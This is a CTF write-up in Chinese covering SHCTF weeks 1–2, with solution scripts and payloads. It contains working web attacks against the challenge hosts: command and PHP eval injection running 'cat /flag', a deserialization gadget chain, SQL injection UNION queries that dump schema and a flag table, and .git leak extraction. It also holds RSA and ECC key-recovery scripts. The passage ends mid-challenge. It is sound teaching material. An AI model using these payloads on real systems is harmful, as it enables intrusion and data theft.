https://ctf.qlu.edu.cn
平台不知道什么时候关闭

尼玛,新生赛一堆,newstar 0xgame都只是打了一下就不想打了,忙不过来了,屁事太多了

还好山河明智,第二周就把新生标签摘了,然后我第一周打的多一些,后面基本是,下密码的附件来看看了


欸,居然有37

week1

web

单身十八年的手速

game.js

1zflask

/robots.txt/s3recttt/api?SSHCTFF=cat /flag

蛐蛐?蛐蛐!

/source.txt,修复乱码

<?php
// Gate 1: both comparisons are loose (== / !=), so PHP type-juggles the string
// parameter before comparing. The check is therefore not a strict equality test and
// can be satisfied by inputs other than the literal "114514"; strict comparison
// (===) on a validated value would close that gap.
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
    if($_POST['ququ']!=null){
        $eval_param = $_POST['ququ'];
        // Only the first 6 bytes are compared with 'ququk1' ...
        if(strncmp($eval_param,'ququk1',6)===0){
            // ... and then the entire request value is handed to eval(), so the
            // caller controls the PHP code that runs. Request data must never reach eval().
            eval($_POST['ququ']);
        }else{
            echo("可以让fault的蛐蛐变成现实么\n");
        }
    }
    echo("蛐蛐成功第一步!\n");

}
else{
    echo("呜呜呜fault还是要出题");
}

/check.php?ququ=114514%00,post:ququ=ququk1;system("cat /flag");或者使用别的分割符同样可以命令执行

ez_gittt

git泄露有的工具下不到源码,点名批评

# Install GitHacker, a tool that rebuilds a repository from a web-exposed /.git/ directory.
pip install GitHacker
# Fetch the exposed repository metadata into ./result
githacker --url http://entry.shc.tf:45317/.git/ --output-folder result
cd result/cb5763aae21e1c5821db1b400953e7f1/.git
# Compare two commits from the recovered history. Anything ever committed stays in
# history even after it is removed from the working tree, which is why a deployed
# web root must not contain (or must deny access to) the .git directory.
git diff 1b2133e98f25813443f66f845153fa0c1c33fd1b 8dd1651ac6dc576566720781e603a606d9cea330

poppopop

<?php
// Holder for two static flags; T::__destruct() sets $Web and F::__toString() sets $SHCTF.
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
// Calls whatever is stored in $p as a function; when $p is an object this triggers
// that object's __invoke().
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
// First link of the chain: __destruct() runs automatically when the object is
// destroyed, sets SH::$Web, and echoing $n forces a string conversion of whatever
// $n holds.
class T {

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
// __toString() fires when an F instance is used as a string; it forwards to $o->flag().
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
// Last link: when the object is called like a function and SH::$Web is set, it calls
// the function named in $isyou with $flag as its argument. Both are plain public
// properties, so a serialized object fully decides which function runs -- the reason
// unserialize() must not be given caller-controlled data.
class SHCTF {
    public $isyou="system";
    public $flag="cat /flllag";
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
// Wire the objects together (T -> F -> C -> SHCTF) and print the serialized graph,
// base64-encoded. Presumably the target passes this value to unserialize(); the
// defensive fix is to keep request data away from unserialize() (use JSON, or
// restrict it with the allowed_classes option).
$a=new T();
$a->n=new F();
$a->n->o=new C();
$a->n->o->p=new SHCTF();
echo base64_encode(serialize($a));

jvav

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

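public class demo {
    /**
     * Runs {@code cat /flag} as a child process and echoes its standard output,
     * one line at a time, to this program's standard output.
     */
    public static void main(String[] args) {
        try {
            // Obtain the JVM's Runtime object
            Runtime runtime = Runtime.getRuntime();
            // Execute the system command
            Process process = runtime.exec("cat /flag");

            // Read the command's output; try-with-resources closes the reader even
            // when reading fails, which the original version did not do
            try (BufferedReader reader = new BufferedReader(
                    new InputStreamReader(process.getInputStream()))) {
                String line;
                while ((line = reader.readLine()) != null) {
                    System.out.println(line);
                }
            }

            // Wait for the command to finish
            process.waitFor();
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}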

MD5 Master

<?php
highlight_file(__file__);

$master = "MD5 master!";

if(isset($_POST["master1"]) && isset($_POST["master2"])){
    // Both comparisons are strict: the two prefixed strings must really differ while
    // their MD5 digests are identical. MD5 is not collision resistant, so such pairs
    // sharing a chosen prefix can be produced; an equality check built on a digest
    // needs a collision-resistant hash (e.g. SHA-256).
    if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
        echo $master . "<br>";
        echo file_get_contents('/flag');
    }
}
else{
    die("master? <br>");
}

master拼接两个参数后的MD5要相同,恰好fastcoll就是干这个的,新建文本文件,把前缀写进去保存,拖入exe文件

import requests
def _read_suffix(path):
    """Return the file's bytes after the 11-byte ``MD5 master!`` prefix.

    The server prepends that prefix itself, so only the remainder is submitted.
    """
    with open(path, 'rb') as handle:
        return handle.read()[11:]


a = _read_suffix("sh_msg1.txt")
b = _read_suffix("sh_msg2.txt")
url = 'http://entry.shc.tf:21869/'
res = requests.post(url, data={"master1": a, "master2": b})
print(res.text)

crypto

Hello Crypto

print(long_to_bytes(m).decode())

EzAES

from Crypto.Util.number import *
from Crypto.Cipher import AES

# Dump the challenge script to stdout; each raw line is decoded with the default
# codec (UTF-8) and printed without adding an extra newline.
with open("chall.py", 'rb') as f:
    file = f.readlines()
print(*(raw.decode() for raw in file), sep='', end='')

c = b'\xd0\xe2d\xe5T\xf9\xd2\xc8U0\xfb\xc8\xcd]b\xf8\x85\xc8\xbe\xa4\xcc3c\x99[\xbd\t(f\x10\xb5D>\xe0\xde\x05\x16\x0b\xdc\x92\xd3\xb0\x1f-PN\xa8P'
iv = b'QWO\xa0\xe8tIvH\xbf\xed\x82~P\xac\xb4'
key = b'\x10:\x0f~\x1bWl\xad\x7f\xf7\xb8\x91\x8f$\xd6\xeb'
# AES-CBC decryption with the key and IV listed above. CBC offers no protection
# once the key is known, so a key must never ship alongside the ciphertext.
aes = AES.new(key, AES.MODE_CBC, iv)
plaintext = aes.decrypt(c)
print(plaintext.decode())

factor

from Crypto.Util.number import *
import random
from enc import flag

m = bytes_to_long(flag)
e = 65537
def prod(iterable):
    """Return the product of every number in *iterable* (1 when it is empty)."""
    product = 1
    for factor in iterable:
        product = product * factor
    return product
# Ten independent 64-bit primes; their product N is published below.
prime_list = [getPrime(64) for _ in range(10) ]
N = prod(prime_list)
# The modulus actually used for encryption takes 7 of those 10 primes and is NOT printed.
p_list = random.sample(prime_list,7)
n = prod(p_list)
c = pow(m,e,n)
print(f"c = {c}")
# NOTE: 64-bit prime factors are far too small -- N can be factored with
# general-purpose tools, after which only the choice of 7 primes remains unknown.
print(f"N = {N}")

yafu分解

from Crypto.Util.number import *
import itertools

c = 982057246005841122681719726162449275140402636679137501643344871376145083063016298600959370629453243515753285445832736433034476775497
N = 111727941450518685645880500356518853696393581139199683397655873524434398483719707355658359575956205560295208672611108319343069181170539103809784492328225885104488345034732063873819178228473087
e = 65537
prime_list = [9750009592369937929, 17631783225707169887, 14897435311328090363, 12219342310321289621, 12027757975747737973,
15158171038546021043, 16488560220293550973, 10283692020046850117, 11073201121963691101, 10429529301865387397]
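# The modulus is a product, so the order of the chosen primes is irrelevant: iterate
# over the C(10, 7) = 120 combinations instead of the 604800 ordered permutations
# (every permutation of the same 7 primes yields the same n and phi).
p_all_list = list(itertools.combinations(prime_list, 7))
for i in p_all_list:
    phi = 1
    n = 1
    for p in i:
        phi *= p-1
        n *= p
    # e must be invertible modulo phi for this subset to be a valid key
    if GCD(e, phi) == 1:
        d = inverse(e, phi)
        flag = long_to_bytes(pow(c, d, n))
        # Only the correct subset decrypts to something carrying the flag prefix
        if b'SHCTF' in flag:
            print(flag.decode())
            break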

d_known

from Crypto.Util.number import *
from gmpy2 import*
from flag import flag

m = bytes_to_long(flag)
p = getPrime(1024)
# q is the very next prime after p, so the two factors are extremely close together
q = next_prime(p)
n = p * q
e = 0x10001
d = inverse(e, (p-1) * (q-1))
c = pow(m, e, n)
print(c)
# WARNING: the private exponent d is printed; only the modulus n is withheld
print(d)
"""
c = 5128269945205941681657162690752124645147095603307776642558620464753149474351813432516302175895967604322423895428085228263377444072843608756088456978614813713707998220343468702704788501256758288635169563164297803428146056603182717915240126485071421659045280467383314498992918502931984546850909367496851620848827787411420736564351902392039206384433279115493991042882911016903299425217764902721104855561290614026117785416484916861798527602885421517301667939650766352244742052165224414400947997222256406536694670357685537325088273890185902387069072204887202971094744552181245341549936791944865465378905842980222407851742
d = 3790271832736808378164485821342007847088299208140809668714802444291303279665930976642897262924930591631798761435880895708714697550489226406467924717484448076572088547295409148608378512478441170191291934724323097031903250264336964541317492561494853799000315044170684567389237337841599036163417916443756372926924022073020766718666542437634977043398727757614795102093582095109387147251701718216785864028290558113041981262382167416454071080366899471219871742443782268440377640255755782371837790956244466349724371425724180875521438840621722917440786455543247168529379012719810694051987668057392173716950629707189238453793
e = 0x10001
"""

打印发现d.bit_length()=2045,跟n差不多大了,我们又知道$e*d-1=k\phi(n)$,而$\phi(n)\approx n$,所以k在[1,e]之间,对$\phi(n)$开平方会得到一个大于p的数,那么我们找小于它的附近的一个素数即可,q就是这个素数的下一个

from Crypto.Util.number import *
import gmpy2
from sympy import *

c = 5128269945205941681657162690752124645147095603307776642558620464753149474351813432516302175895967604322423895428085228263377444072843608756088456978614813713707998220343468702704788501256758288635169563164297803428146056603182717915240126485071421659045280467383314498992918502931984546850909367496851620848827787411420736564351902392039206384433279115493991042882911016903299425217764902721104855561290614026117785416484916861798527602885421517301667939650766352244742052165224414400947997222256406536694670357685537325088273890185902387069072204887202971094744552181245341549936791944865465378905842980222407851742
d = 3790271832736808378164485821342007847088299208140809668714802444291303279665930976642897262924930591631798761435880895708714697550489226406467924717484448076572088547295409148608378512478441170191291934724323097031903250264336964541317492561494853799000315044170684567389237337841599036163417916443756372926924022073020766718666542437634977043398727757614795102093582095109387147251701718216785864028290558113041981262382167416454071080366899471219871742443782268440377640255755782371837790956244466349724371425724180875521438840621722917440786455543247168529379012719810694051987668057392173716950629707189238453793
e = 0x10001
print(d.bit_length())
# e*d - 1 is a multiple k*phi(n) with 1 <= k < e, so every k that divides it
# exactly yields a candidate phi(n).
ed_minus_1 = e*d - 1
for i in range(1, e):
    quotient, remainder = divmod(ed_minus_1, i)
    if remainder == 0:
        phi = quotient
        # p and q are consecutive primes, so both sit next to sqrt(phi)
        p = prevprime(gmpy2.iroot(phi, 2)[0])
        q = nextprime(p)
        # Accept the candidate only when it reproduces phi exactly
        if (p-1)*(q-1) == phi:
            n = p*q
            print(long_to_bytes(pow(c, d, n)).decode())
            break

baby_mod

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
r = getPrime(777)
t = getPrime(777)
# tmp is only a 15-bit prime, i.e. it has fewer than 2**15 possible values
tmp = getPrime(15)
e = 65537
n = p*q
print(f"c = {pow(m,e,n)}")
# leak is a linear relation in the secret primes p and q. r and t are printed below,
# so tmp is the only other unknown, and it is small enough to enumerate.
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 25900013611745459234449421352128550791380405075852427844520047672976045705053669812761027512471099887955926922807763156068475467691843960238860198209869207050769506000272083846340089993442226307892271915673319497925726165266677353649105096919576206677557645681229463591571683344132256764727867218414475821414
leak = 1315576698569519021825869605558080173961766113174117516895155642458801441613594247202719705730125235122134470528523180642252331178634029317505467190118181724443647215388521217342902429209926124347180537512385923020087294072947165058918179896904165121851416283369980345261683209548370901441893420488465961879888423704643272728339367303995737167427397015998668341503217114591217674582342979
r = 449509105386333182769495605541266433612190248649889527500668938725282197092696225044504839710548395681491923335485736430311542544811714539401973591141967042310944552061762227459161233997399455785984753772614529066263632633766099414193
t = 466570739651607385339907801250236144323523615960304899132337822754876522678249651820805564899362256608057888046522867494446053404906721052232912923778440295889959052577191557765649038942151814731893947704867634072305897918671425093691
'''

参考https://dexterjie.github.io/2024/08/06/赛题复现/SRCTF/#Baby
小改一下

# sage
# Lattice basis adapted from the referenced write-up: the first column holds
# leak, r, -t and 1, and the last row carries a 2^500 weight.
# The reduction step itself is not shown in this snippet.
Ge = Matrix(ZZ,[
    [leak,0,0,0],
    [r,1,0,0],
    [-t,0,1,0],
    [1,0,0,2^500]
])

当时给新生赛出题,找点资料,突然翻到了Lst4r师傅的一篇wp,发现这东西原来是丢番图方程,$pr-qt=leak+temp$与$ax+by=c$形式一致,只要$GCD(a,b)=d|c$,则方程有解,这好像跟解同余方程有一点的联系啊,然后推导过程,其实这里就是GCD(a,b)=1,才有了后面的东西
$ax-by=c$
$ax\equiv c\ (mod\ b)$
$x=c*a^{-1}\ (mod\ b)$
$y=(ax-c)//b$
说实话,格版本的还不能很能看懂目前
然后又去看了同余方程,以为二者互通解法,其实只要ab互素包直接出的,但我那题同余方程是不互素的,所以逆元不存在,然后出题不小心选的是互素的,这下改小小,就还回来我同余方程的预期解法了,差点要非预期
总结就是,互素都是直接出,二者没有本质区别;不互素,同余方程求解还是得靠egcd,毕竟二者还是同一个东西吧,所以都还是egcd
本道题运用的其实就取模和整除

from tqdm import *
from Crypto.Util.number import *

e = 65537
c = 25900013611745459234449421352128550791380405075852427844520047672976045705053669812761027512471099887955926922807763156068475467691843960238860198209869207050769506000272083846340089993442226307892271915673319497925726165266677353649105096919576206677557645681229463591571683344132256764727867218414475821414
leak = 1315576698569519021825869605558080173961766113174117516895155642458801441613594247202719705730125235122134470528523180642252331178634029317505467190118181724443647215388521217342902429209926124347180537512385923020087294072947165058918179896904165121851416283369980345261683209548370901441893420488465961879888423704643272728339367303995737167427397015998668341503217114591217674582342979
r = 449509105386333182769495605541266433612190248649889527500668938725282197092696225044504839710548395681491923335485736430311542544811714539401973591141967042310944552061762227459161233997399455785984753772614529066263632633766099414193
t = 466570739651607385339907801250236144323523615960304899132337822754876522678249651820805564899362256608057888046522867494446053404906721052232912923778440295889959052577191557765649038942151814731893947704867634072305897918671425093691
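# r^{-1} mod t does not depend on the guess for tmp, so compute it once instead of
# once per iteration.
r_inv = inverse(r, t)
# tmp is a 15-bit prime, hence it lies in [2**14, 2**15)
for i in tqdm(range(2**14, 2**15)):
    # leak + tmp = p*r - q*t  =>  p ≡ (leak + tmp) * r^{-1} (mod t), and p < t
    p = (leak+i)*r_inv % t
    q = (r*p-(leak+i))//t
    if q > 0:
        n = p*q
        if GCD(e,(p-1)*(q-1))==1:
            d = inverse(e, (p-1)*(q-1))
            flag = long_to_bytes(pow(c, d, n))
            # A wrong guess decrypts to noise; only the right one shows the flag prefix
            if b'SHCTF{' in flag:
                print(f'{p = }')
                print(f'{q = }')
                print(flag)
                break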
# p = 10828571852464331341712150217058916119291334034775990469361200035678740509774480669454106468384506195444300931477689490439063149020461676127989241184154737
# q = 7612918354236349590305500410457447666517294016150410935511115244808748864036428494251452016172971676206380973588984417215894793791556907054138118188367171
# b'SHCTF{39066b49-7c3f-47a3-a7d7-546c11048817}'
# 64%

misc

签到题

SHCTF我又踏马来辣!,延续去年传统

拜师之旅①

png头尾缺失补齐,crc校验,宽高不对:python Deformed-Image-Restorer.py -i roxy.png

真真假假?遮遮掩掩!

一开始还以为是伪加密,一看又是山河经典的掩码SHCTF??????FTCHS

Rasterizing Traffic()

fake flag,流量包有图片grating.png,导出保存

光栅图片,没找到工具解……

week2

web

guess_the_number

/s0urce

import flask
import random
from flask import Flask, request, render_template, send_file

app = Flask(__name__)

@app.route('/')
def index():
    """Render the landing page, handing the first generated number to the template."""
    context = {'first_num': first_num}
    return render_template('index.html', **context)

@app.route('/s0urce')
def get_source():
    """Offer the application's own source file (``app.py``) as a download."""
    return send_file("app.py", as_attachment=True)

@app.route('/first')
def get_first_number():
    """Return the first generated number as plain text."""
    return f"{first_num}"

@app.route('/guess')
def verify_seed():
    """Return the contents of ``/flag`` when ``num`` equals the second generated number.

    Any other value (including a missing parameter) gets the string ``nonono``.
    """
    guess = request.args.get('num')
    if guess != str(second_num):
        return "nonono"
    with open("/flag", "r") as file:
        return file.read()

def init():
    """Seed the global PRNG and derive the two numbers the routes rely on.

    NOTE(security): the seed has only 9,000,000 possible values and ``first_num``
    is served to every client, so the seed -- and with it ``second_num`` -- can be
    found by exhaustive search. A value that guards a secret should come from the
    ``secrets`` module, never from a seeded ``random``.
    """
    global seed, first_num, second_num
    low, high = 1000000000, 9999999999
    seed = random.randint(1000000, 9999999)
    random.seed(seed)
    # Evaluated left to right, so first_num consumes the first draw
    first_num, second_num = random.randint(low, high), random.randint(low, high)

init()
# NOTE(security): debug=True turns on Flask's interactive debugger and reloader;
# it must never be enabled on a deployment that other people can reach.
app.run(debug=True)

随机数种子缺陷

import random
import requests
from tqdm import *

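first_num = 5277451103
# The server draws its seed with randint(1000000, 9999999), which includes both
# ends, so the search range has to include 9999999 as well (range() excludes its
# upper bound; the original stopped one short).
for i in tqdm(range(1000000, 10000000)):
    random.seed(i)
    test = random.randint(1000000000, 9999999999)
    # The first output identifies the seed; the next output is then the second number
    if test == first_num:
        second_num = random.randint(1000000000, 9999999999)
        res = requests.get(
            f'http://210.44.150.15:25622/guess?num={second_num}')
        print(res.text)
        break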

自助查询

?id=") or 1=1#,先闭合看看能不能实现注入,很明显看见只有两列

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,database()#
库名:ctf

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'#
表名:flag,users

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#
flag表的字段名:id,scretdata

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
users表的字段名:id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

SELECT username,password FROM users WHERE id = ("1") or 1 union select 1,group_concat(scretdata) from flag#
被你查到了, 果然不安全,把重要的东西写在注释就不会忘了

对列进行查询

# 查列名
SELECT username,password FROM users WHERE id = ("1") or 1 union SELECT database(),column_name FROM information_schema.columns
# 查列内容
SELECT username,password FROM users WHERE id = ("1") or 1 union SELECT database(),column_comment FROM information_schema.columns

crypto

worde很大

题目

import gmpy2
from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
n = p*q
# e is a random 200-bit prime, far larger than the usual 65537
e = getPrime(200)
d = gmpy2.invert(e,(p-1)*(q-1))
# dp is the CRT private exponent for p
dp = d % (p-1)
c = pow(m,e,n)

print(f"n = {n}")
print(f"c = {c}")
print(f"e = {e}")
# WARNING: dp is private-key material. Printed together with (n, e) it is enough
# to factor n, so it must be protected exactly like d.
print(f"dp = {dp}")
'''
n = 82247919658489810380240839087349167312391675556067956600144360018088524333106039088812004869379422909437743425492911024763226188814125737536109723777661903520234200005812281602815883855435148880431018374620973909944500345461605934516034328785791858741385301710414531253610756328999895737908157933318003199437
c = 19004135050577774560981288431097099079736191413880885912007978892726509267290991113342873896047249218117502631896913170767293584589689916540020860025359287210204445330821495515587691705398818016395710639666764267452777850179744742716838946605733861264261086076963704643146910966580500292644632757738898750640
e = 1222271536436538502303564845180492076631965040858206171530223
dp = 5756836428205079089595585945891670886537656746897710776494815731928932139888141976203071290262270694899459619924115230892248604680645140941830553958594301
'''

https://hvang10.github.io/2024/08/12/第四届山石CTF训练营/
babyrsa,构造费马

from Crypto.Util.number import *
# e*dp ≡ 1 (mod p-1), so by Fermat's little theorem 2^(e*dp) ≡ 2 (mod p):
# p divides 2^(e*dp) - 2, and the gcd with n isolates it.
residue = pow(2, e*dp, n) - 2
p = GCD(residue, n)
# Decrypting modulo p alone is enough when the message is smaller than p
plaintext = pow(c, dp, p)
print(long_to_bytes(plaintext))

魔鬼的步伐

题目

from Crypto.Util.number import *
from random import choice
from enc import flag

m = bytes_to_long(flag)
def get_primes(limit):
    """Return all primes ``<= limit`` in ascending order (sieve of Eratosthenes)."""
    sieve = [True] * (limit + 1)
    found = []
    for candidate in range(2, limit + 1):
        if not sieve[candidate]:
            continue
        found.append(candidate)
        # Smaller multiples were already crossed out by smaller primes
        for composite in range(candidate * candidate, limit + 1, candidate):
            sieve[composite] = False
    return found

def get_Prime(bits):
    """Return a prime ``n + 1`` where ``n`` is 2 times a product of small primes.

    ``n`` grows by multiplying in random entries of the global ``primes`` list
    until it has at least *bits* bits; ``n + 1`` is returned if it is prime,
    otherwise the construction starts over. By construction ``p - 1`` has only
    small prime factors, which is exactly what makes such a prime unsuitable for RSA.
    """
    while True:
        smooth = 2
        while smooth.bit_length() < bits:
            smooth = smooth * choice(primes)
        candidate = smooth + 1
        if isPrime(candidate):
            return candidate

e = 65537
# Every prime up to 65537 is a candidate factor for p-1 and q-1
primes = get_primes(e)
# Both RSA primes come from get_Prime(), so p-1 and q-1 are products of primes
# <= 65537. Such smooth p-1 values make n factorable with Pollard's p-1 method;
# RSA primes should be drawn uniformly at random instead.
p = get_Prime(512)
q = get_Prime(512)
n = p*q
c = pow(m,e,n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
'''
n = 33049334433301642832276449462878199425586003075363704632299361359635418571202120149638949400299018113342381561003380476578452867397448279205470367999826880102323557636492461892702632205491422046049109130726973943645824051991662952301697690337766318065326751352192106485980054784289527854584092550645702701746223881
e = 65537
c = 15394419310248814507510133312306135076155666347831968302673818044165993197079455389123001640582969004883715894754137770792509616543743423839219703779259418731422736400578259902468529503256749854724887132016186964074984277399760948419395368792639982783770903783472249503330890702692418839718262891255865389875185554
'''

get_primes()函数是基于埃拉托斯特尼筛法Sieve of Eratosthenes的变种,它是一种高效的找出一定范围内所有素数的方法,isPrime(n + 1),可以得到本题的考点为p-1光滑

from Crypto.Util.number import *

n =
e = 65537
c =

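def Poolard_p_1(N):
    """Split *N* with Pollard's p-1 method and return ``(factor, cofactor)``.

    The base 2 is raised to 2, 3, 4, ... in turn (so after step k it equals
    ``2**(k!) mod N``); as soon as ``gcd(base - 1, N)`` is a proper divisor it is
    returned with ``N // factor``. This finishes quickly only when some prime
    factor ``p`` of *N* has a smooth ``p - 1`` -- the weakness that random prime
    generation avoids.

    Raises:
        ValueError: if the running power collapses to 0 or 1 modulo *N*. From then
            on every further step gives the same trivial gcd, so the original loop
            would never terminate.
    """
    from math import gcd  # local import keeps the function self-contained

    base, exponent = 2, 2
    while True:
        base = pow(base, exponent, N)
        if base <= 1:
            raise ValueError("p-1 method found no proper factor of N with base 2")
        factor = gcd(base - 1, N)
        if 1 < factor < N:
            return factor, N // factor
        exponent += 1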

# With both factors known the private exponent follows directly
p, q = Poolard_p_1(n)
phi = (p-1)*(q-1)
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m).decode())

something hiden

ezECC

题目

from Crypto.Util.number import *
from flag import flag

assert flag.startswith(b'SHCTF{')

# The message is the next prime above the flag's integer value, not the flag itself
m = next_prime(bytes_to_long(flag))
p = getPrime(512)
a,b = getPrime(128),getPrime(128)
E = EllipticCurve(Zmod(p),[a,b])
k = getPrime(256)
A1 = E.random_point()
A2 = A1*k
# M is a curve point whose x-coordinate is m; it is masked by adding A2 = k*A1
M = E.lift_x(m)
C = M+A2

print('p = ',p)
# WARNING: k is the secret scalar of this scheme, yet it is printed together with
# A1 and C, so anyone can recompute A2 and subtract it from C. The curve parameters
# a and b are not printed, but two known points on the curve determine them.
print('k = ',k)
print('A1 = ',A1)
print('C = ',C)
"""
p = 9799485259524549113003780400336995829253375211044694607315372450399356814285244762186468904824132005209991983177601498069896166228214442123763065076327679
k = 73771953838487511457389800773038323262861649769228176071578897500004883270121
A1 = (5945412329827707694132352090606154232045921322662767755331097180167148601629747751274580872108985870208681845078153424348847330421799769770041805208089791 : 4113102573821904570542216004200810877456931033522276527318388416329888348077285857968081007666714313806776668203284797556825595791189566621228705928598709 : 1)
C = (2336301464307188733995312208152021176388718095735565422234047912672553316288080052957448196669174030921526180747767251838308335308474037066343018337141276 : 6868888273736103386336636953449998615833854869329393895956720058438723636197866928342387693671211918574357564701700555086194574821628053750572619551290025 : 1)
"""

通过给定的两个点,求出ab,问了一下出题人,题目信息貌似并不完全正确,得在前一个素数和当前素数之间进行爆破

# sage
from Crypto.Util.number import *
from sage.all import *

p = 9799485259524549113003780400336995829253375211044694607315372450399356814285244762186468904824132005209991983177601498069896166228214442123763065076327679
k = 73771953838487511457389800773038323262861649769228176071578897500004883270121
A1 = (5945412329827707694132352090606154232045921322662767755331097180167148601629747751274580872108985870208681845078153424348847330421799769770041805208089791 , 4113102573821904570542216004200810877456931033522276527318388416329888348077285857968081007666714313806776668203284797556825595791189566621228705928598709)
C = (2336301464307188733995312208152021176388718095735565422234047912672553316288080052957448196669174030921526180747767251838308335308474037066343018337141276 , 6868888273736103386336636953449998615833854869329393895956720058438723636197866928342387693671211918574357564701700555086194574821628053750572619551290025)
# A1 and C both satisfy y^2 = x^3 + a*x + b (mod p). Subtracting the two equations
# eliminates b and gives a; b then follows from A1 alone.
a=int(inverse(A1[0]-C[0],p)*(A1[1]^2-C[1]^2-A1[0]^3+C[0]^3)%p)
b=int((A1[1]^2-A1[0]^3-a*A1[0])%p)
E = EllipticCurve(Zmod(p),[a,b])
C = E.point(C)
A1 = E.point(A1)
# Remove the mask k*A1 to get the message point; its x-coordinate is m
m = C-A1*k
print(f'm = {m[0]}')
# python
from Crypto.Util.number import *
from sympy import *
m = 133829459905635890502862981237631940794467118483270617546174979
print(long_to_bytes(m))
# The challenge used next_prime(flag), so the real value lies between the previous
# prime and m; list every candidate in that gap whose last byte is '}'.
m1 = prevprime(m)
print(long_to_bytes(m1))
for i in range(m1, m):
    flag = long_to_bytes(i)
    if flag.endswith(b'}'):
        print(flag.decode())

pading

题目

from Crypto.Util.number import *
import gmpy2
flag = b'SHCTF{********}'
assert len(flag) == 39
p = getPrime(512)
q = getPrime(512)
n = p * q
# Public exponent 3 with no randomised padding (textbook RSA)
e = 0x3
# The "padding" is a fixed, public suffix. Together with the known flag prefix most
# of the plaintext is known; only the 32 bytes inside the braces are secret. With
# e = 3 that is within reach of Coppersmith's small-root method, which is why real
# deployments use randomised padding such as RSA-OAEP.
pad = b'a_easy_problem'
c = pow(bytes_to_long(flag + pad),e,n)
print(f'n = {n}')
print(f'c = {c}')
'''
n = 97267171048088381496066192626635197453217164564868791036244179896351325689651647300515730561304963255114869511478914996031421842629280169299477338281118325550531655231549821271665600124109279443980829977781199806450042470016020636640703547622978932751689687167828765412348742136309101175003219210818245550233
c = 45010260588576847169114899728599361533379262804019563744039173126890376093283589687354320048969349244237974443778624464334226062734150084458832462402162698053900389565767914602287253167328691766940007844822055298249437834407081828025295154876721602702763359699362974932711252222438004294561141105423731699107
'''

打m高低位泄露且低加密指数

# sage
from sage.all import *
from Crypto.Util.number import *
n = 97267171048088381496066192626635197453217164564868791036244179896351325689651647300515730561304963255114869511478914996031421842629280169299477338281118325550531655231549821271665600124109279443980829977781199806450042470016020636640703547622978932751689687167828765412348742136309101175003219210818245550233
c = 45010260588576847169114899728599361533379262804019563744039173126890376093283589687354320048969349244237974443778624464334226062734150084458832462402162698053900389565767914602287253167328691766940007844822055298249437834407081828025295154876721602702763359699362974932711252222438004294561141105423731699107
m_high = bytes_to_long(b'SHCTF{')
m_low = bytes_to_long(b'}a_easy_problem')
# Plaintext layout in bytes: 6 known + 32 unknown + 15 known (53 bytes = 424 bits)
R.< x > = PolynomialRing(Zmod(n))
# m = m_high * 2^376 + x * 2^120 + m_low, with x the unknown middle part
f = ((m_high << 376)+x*2 ^ 120+m_low)^3-c
f = f.monic()
# The middle 256 bits of m are unknown
roots = f.small_roots(X=2 ^ 256, beta=0.4,epsilon=0.02)
for root in roots:
    m = (m_high << 376)+int(root)*2 ^ 120+m_low
    print(long_to_bytes(int(m)).decode())

E&R

题目

#sage
from Crypto.Util.number import *
from secret import flag

# Strip the 6-byte prefix and the closing brace, then split the body in half
flag = flag[6:-1]
l = len(flag)
m1 = bytes_to_long(flag[:l//2])
m2 = bytes_to_long(flag[l//2:])
#RSA
# NOTE: two 256-bit primes give a 512-bit modulus, which is too small to resist factoring
p = getPrime(256)
q = getPrime(256)
n = p * q
e = 65537
# r_q is q with its binary digits reversed; leak is p XOR r_q (^^ is XOR in Sage)
r_q = int(bin(q)[2:][::-1] , 2)
leak = p ^^ r_q
c = pow(m2,e,n)

#ECC
# Curve over Z/nZ; m1 is the x-coordinate of G, and P = e*G is published
E = EllipticCurve(Zmod(n),[114514,1919810])
G = E.lift_x(Integer(m1))
P = G * e
print(f'leak = {leak}')
print(f'n = {n}')
print(f'c = {c}')
print(f'P = {P}')
# leak = 5599968251197363876087002284371721787318931284225671549507477934076746561842
# n = 7120275986401660066259983193598830554385933355254283093021239164350142898387660104515624591378875067038235085428170557400012848874756868985306042421950909
# c = 6803450117490196163076010186755045681029929816618361161925865477601994608941714788803007124967390157378525581080320415602012078322064392991884070073083436
# P = (4143131125485719352848137000299706175276016714942734255688381872061184989156686585992844083387698688432978380177564346382756951426943827434190895490233627 : 3879946878859691332371384275396678851932267609535096278038417524609690721322205780110680003522999409696718745532857001461869452116434787256032366267905519 : 1)

说实话leak = p ^^ r_q这个是干嘛的,如果真搞p异或q的反二进制数,确实会很棘手
但这里,n是可以直接分解的(这算非预期吧),然后解ECC的时候,换成p的整数环Zmod(p)即可

# sage
from Crypto.Util.number import *
from sage.all import *

e = 65537
n = 7120275986401660066259983193598830554385933355254283093021239164350142898387660104515624591378875067038235085428170557400012848874756868985306042421950909
c = 6803450117490196163076010186755045681029929816618361161925865477601994608941714788803007124967390157378525581080320415602012078322064392991884070073083436
